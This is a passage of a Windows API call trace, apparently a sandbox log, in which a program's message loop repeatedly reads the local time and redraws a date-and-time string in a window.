returned 1 [0112.938] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.938] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.938] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x2a7)) [0112.938] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x2a7)) [0112.938] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.949] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.949] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.949] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x2b2)) [0112.949] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x2b2)) [0112.949] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.970] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.970] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.970] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x2c7)) [0112.970] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x2c7)) [0112.970] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.981] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.981] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.981] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x2d2)) [0112.981] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x2d2)) [0112.981] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0114.862] TranslateMessage (lpMsg=0x2347a14) returned 0 [0114.862] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0114.862] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x25b)) [0114.862] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x25b)) [0114.862] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0114.863] GetDC (hWnd=0x0) returned 0xa0100d0 [0114.869] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0114.869] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0114.869] GetSysColor (nIndex=8) returned 0x0 [0114.869] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0114.870] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0114.870] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0114.870] UnrealizeObject (h=0x2d10099f) returned 1 [0114.870] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0114.870] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0114.870] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0114.872] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:44 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:44 PM", lprc=0x19f5bd) returned 13 [0114.874] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0114.874] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0114.874] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0114.874] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0114.874] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0114.875] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0114.875] TranslateMessage (lpMsg=0x2347a14) returned 0 [0114.875] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0114.875] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x268)) [0114.875] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x268)) [0114.875] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0114.891] TranslateMessage (lpMsg=0x2347a14) returned 0 [0114.891] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0114.891] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x278)) [0114.891] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x278)) [0114.892] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0114.909] TranslateMessage (lpMsg=0x2347a14) returned 0 [0114.909] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0114.909] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x28a)) [0114.910] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x28a)) [0114.910] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0114.921] TranslateMessage (lpMsg=0x2347a14) returned 0 [0114.921] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0114.921] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x295)) [0114.921] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x295)) [0114.921] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0115.287] TranslateMessage (lpMsg=0x2347a14) returned 0 [0115.287] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0115.287] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x1c)) [0115.287] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x1c)) [0115.287] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0115.287] GetDC (hWnd=0x0) returned 0xa0100d0 [0115.287] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0115.287] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0115.288] GetSysColor (nIndex=8) returned 0x0 [0115.288] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0115.288] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0115.288] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0115.288] UnrealizeObject (h=0x2d10099f) returned 1 [0115.288] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0115.288] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0115.288] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0115.288] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:45 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:45 PM", lprc=0x19f5bd) returned 13 [0115.288] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0115.288] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0115.288] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0115.288] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0115.288] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0115.288] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0115.301] TranslateMessage (lpMsg=0x2347a14) returned 0 [0115.301] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0115.301] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x2a)) [0115.302] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x2a)) [0115.302] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0115.313] TranslateMessage (lpMsg=0x2347a14) returned 0 [0115.313] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0115.313] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x36)) [0115.313] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x36)) [0115.313] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0115.366] TranslateMessage (lpMsg=0x2347a14) returned 0 [0115.366] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0115.366] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x6a)) [0115.366] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x6a)) [0115.366] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0115.406] TranslateMessage (lpMsg=0x2347a14) returned 0 [0115.406] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0115.406] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x92)) [0115.406] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x93)) [0115.406] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0115.410] TranslateMessage (lpMsg=0x2347a14) returned 0 [0115.410] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0115.410] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x96)) [0115.410] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x96)) [0115.410] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0115.516] TranslateMessage (lpMsg=0x2347a14) returned 0 [0115.516] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0115.516] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x101)) [0115.516] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2d, wMilliseconds=0x101)) [0115.516] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.378] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.378] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.379] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x77)) [0116.379] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x77)) [0116.379] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0116.379] GetDC (hWnd=0x0) returned 0xa0100d0 [0116.379] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0116.380] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0116.380] GetSysColor (nIndex=8) returned 0x0 [0116.380] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0116.380] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0116.380] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0116.380] UnrealizeObject (h=0x2d10099f) returned 1 [0116.380] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0116.380] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0116.380] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0116.380] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:46 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:46 PM", lprc=0x19f5bd) returned 13 [0116.381] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0116.381] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0116.381] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0116.381] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0116.381] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0116.381] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.390] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.390] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.390] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x83)) [0116.390] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x83)) [0116.390] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.432] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.432] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.432] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0xad)) [0116.432] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0xad)) [0116.432] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.441] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.441] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.441] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0xb6)) [0116.441] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0xb6)) [0116.441] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.452] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.452] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.452] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0xc1)) [0116.452] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0xc1)) [0116.452] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.472] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.472] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.472] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0xd5)) [0116.472] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0xd5)) [0116.472] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.729] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.729] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.729] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x1d6)) [0116.730] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x1d7)) [0116.730] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.739] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.739] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.739] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x1e0)) [0116.739] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x1e0)) [0116.739] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.750] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.750] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.750] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x1eb)) [0116.750] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x1eb)) [0116.750] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.835] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.835] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.835] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x240)) [0116.835] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x240)) [0116.835] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.844] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.844] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.844] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x249)) [0116.844] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x249)) [0116.844] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.860] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.860] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.860] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x259)) [0116.860] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x259)) [0116.860] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.935] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.935] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.935] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x2a4)) [0116.935] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x2a4)) [0116.935] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.956] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.956] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.956] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x2b9)) [0116.956] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x2b9)) [0116.956] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0116.967] TranslateMessage (lpMsg=0x2347a14) returned 0 [0116.967] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0116.967] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2e, wMilliseconds=0x2c4)) [0116.967] 